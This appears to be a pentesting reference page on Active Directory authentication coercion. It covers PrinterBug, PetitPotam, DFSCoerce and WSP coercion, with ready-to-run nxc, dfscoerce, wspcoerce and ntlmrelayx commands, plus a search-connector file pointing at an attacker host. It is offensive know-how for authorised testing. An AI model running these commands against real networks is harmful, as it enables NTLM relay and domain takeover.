internal-relay-coerce.md (7788B)
1 --- 2 title: "Internal - Coerce" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/internal-relay-coerce.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-relay-coerce.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Internal - Coerce 12 13 Coerce refers to forcing a target machine (usually with SYSTEM privileges) to authenticate to another machine. 14 15 ## Signing 16 17 ### Server Side Signing 18 19 | Operating System | SMB Signing | LDAP Signing | 20 | ------------------------------- | ----------- | ------------ | 21 | Windows Server 2019 DC | ✅ | ❌ | 22 | Windows Server 2022 DC pre 23H2 | ✅ | ❌ | 23 | Windows Server 2022 DC 23H2 | ✅ | ✅ | 24 | Windows Server 2025 DC | ✅ | ✅ | 25 | Windows Server 2019 Member | ❌ | - | 26 | Windows Server 2022 Member | ❌ | - | 27 | Windows Server 2025 Member | ❌ | - | 28 | Windows 10 | ❌ | - | 29 | Windows 11 23H2 | ❌ | - | 30 | Windows 11 24H2 | ✅ | - | 31 32 * Server-side SMB signing has been enabled on domain controllers 33 * Server-side SMB signing is still not required by default on non-DC Windows server 34 35 ### EPA 36 37 * [zyn3rgy/RelayInformer](https://github.com/zyn3rgy/RelayInformer) - Python and BOF utilites to the determine EPA enforcement levels of popular NTLM relay targets from the offensive perspective. 38 39 ```ps1 40 uv run relayinformer mssql --target 10.10.10.10 --user USER --password PASSWORD 41 uv run relayinformer http --url http://10.10.10.10/page --user USER --password PASSWORD 42 uv run relayinformer ldap --method BOTH --dc-ip 10.10.10.10 --user USER --password PASSWORD 43 uv run relayinformer ldap --method LDAPS --dc-ip 10.10.10.10 --user USER --password PASSWORD 44 ``` 45 46 | EPA Values | Description | 47 | ----------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | 48 | Disabled / Never | You should generally be able to target with NTLM relay, regardless of the client's support for EPA or version of NTLM being used. | 49 | Allowed / Accepted / When Supported | You can theoretically conduct an NTLM relay but common relay scenarios will not work because standard coercion / poisoning techniques (mentioned above) will result in the addition of EPA-relevant AV pairs, indicating the client’s support for EPA. | 50 | Required | NTLM relay should be prevented by validation of values provided in EPA-relevant AV pairs. | 51 52 ## WebClient Service 53 54 * On Windows workstations, the WebClient service is installed by default. 55 * On Windows servers, it is not installed by default 56 57 **Enable WebClient**: 58 59 WebClient service can be enabled on the machine using several techniques: 60 61 * Mapping a WebDav server using `net` command : `net use ...` 62 * Typing anything into the explorer address bar that isn't a local file or directory 63 * Browsing to a directory or share that has a file with a `.searchConnector-ms` extension located inside. 64 65 ```xml 66 <?xml version="1.0" encoding="UTF-8"?> 67 <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector"> 68 <description>Microsoft Outlook</description> 69 <isSearchOnlyItem>false</isSearchOnlyItem> 70 <includeInStartMenuScope>true</includeInStartMenuScope> 71 <templateInfo> 72 <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType> 73 </templateInfo> 74 <simpleLocation> 75 <url>http://attacksystem/path</url> 76 </simpleLocation> 77 </searchConnectorDescription> 78 ``` 79 80 Check if the WebDav service is running 81 82 ```ps1 83 nxc smb <ip> -u 'user' -p 'pass' -M webdav 84 ``` 85 86 ## MS-RPRN - PrinterBug 87 88 **Tools**: 89 90 * [leechristensen/SpoolSample](https://github.com/leechristensen/SpoolSample) - PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. 91 92 **Examples**: 93 94 ```ps1 95 poetry run nxc smb 10.10.10.10/24 -u username -p password -M coerce_plus -o METHOD=PrinterBug 96 ``` 97 98 Checking if the Spooler Service is running. 99 100 ```ps1 101 nxc smb <ip> -u 'user' -p 'pass' -M spooler 102 ``` 103 104 ## MS-EFSR - PetitPotam 105 106 The tools use the LSARPC named pipe with interface `c681d488-d850-11d0-8c52-00c04fd90f7e` because it's more prevalent. But it's possible to trigger with the EFSRPC named pipe and interface `df1941c5-fe89-4e79-bf10-463657acf44d`. 107 108 **Tools**: 109 110 * [topotam/PetitPotam](https://github.com/topotam/PetitPotam) - PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions. 111 112 **Examples**: 113 114 ```ps1 115 poetry run nxc smb 10.10.10.10/24 -u username -p password -M coerce_plus -o METHOD=PetitPotam 116 ``` 117 118 ## MS-DFSNM - DFS Coercion 119 120 DFS Coerce (MS-DFSNM abuse) is a technique to force a Windows system to authenticate to an attacker-controlled machine by abusing the DFS Namespace Management RPC interface. 121 122 **Tools**: 123 124 * [Wh04m1001/DFSCoerce](https://github.com/Wh04m1001/DFSCoerce) - PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot methods. 125 126 **Examples**: 127 128 ```ps1 129 python3 dfscoerce.py -u username -d domain.local 10.10.10.10 10.10.10.11 130 poetry run nxc smb 10.10.10.10/24 -u username -p password -M coerce_plus -o METHOD=DFSCoerce 131 ``` 132 133 ## MS-WSP - WSP Coercion 134 135 * The `wsearch` service is only enabled by default on workstations, and has been disabled on servers since Server 2016. 136 * Only SMB connections can be coerced with WSP. 137 138 **Tools**: 139 140 * [slemire/WSPCoerce](https://github.com/slemire/WSPCoerce) - PoC to coerce authentication from Windows hosts using MS-WSP. 141 * [RedTeamPentesting/wspcoerce](https://github.com/RedTeamPentesting/wspcoerce) - wspcoerce coerces a Windows computer account via SMB to an arbitrary target using MS-WSP. 142 143 **Examples**: 144 145 ```ps1 146 WSPCoerce.exe <target> <listener> 147 WSPCoerce.exe labsw1 172.23.10.109 148 WSPCoerce.exe labsw1 labsrv1 149 150 wspcoerce 'lab.redteam/rtpttest:test1234!@192.0.2.115' "file:////attacksystem/share" 151 ntlmrelayx.py -t "http://192.0.2.5/certsrv/" -debug -6 -smb2support --adcs 152 ``` 153 154 * Can't use an IP address for the target, use a short hostname only (no FQDN) 155 * Make sure to use a hostname or FQDN for the listener if you want to receive Kerberos auth 156 157 ## References 158 159 * [Changes to SMB Signing Enforcement Defaults in Windows 24H2 - Michael Grafnetter - January 26, 2025](https://www.dsinternals.com/en/smb-signing-windows-server-2025-client-11-24h2-defaults/) 160 * [Less Praying More Relaying – Enumerating EPA Enforcement for MSSQL and HTTPS - Nick Powers, Matt Creel - November 25, 2025](https://specterops.io/blog/2025/11/25/less-praying-more-relaying-enumerating-epa-enforcement-for-mssql-and-https/) 161 * [The Ultimate Guide to Windows Coercion Techniques in 2025 - RedTeam Pentesting - June 4, 2025](https://blog.redteam-pentesting.de/2025/windows-coercion/)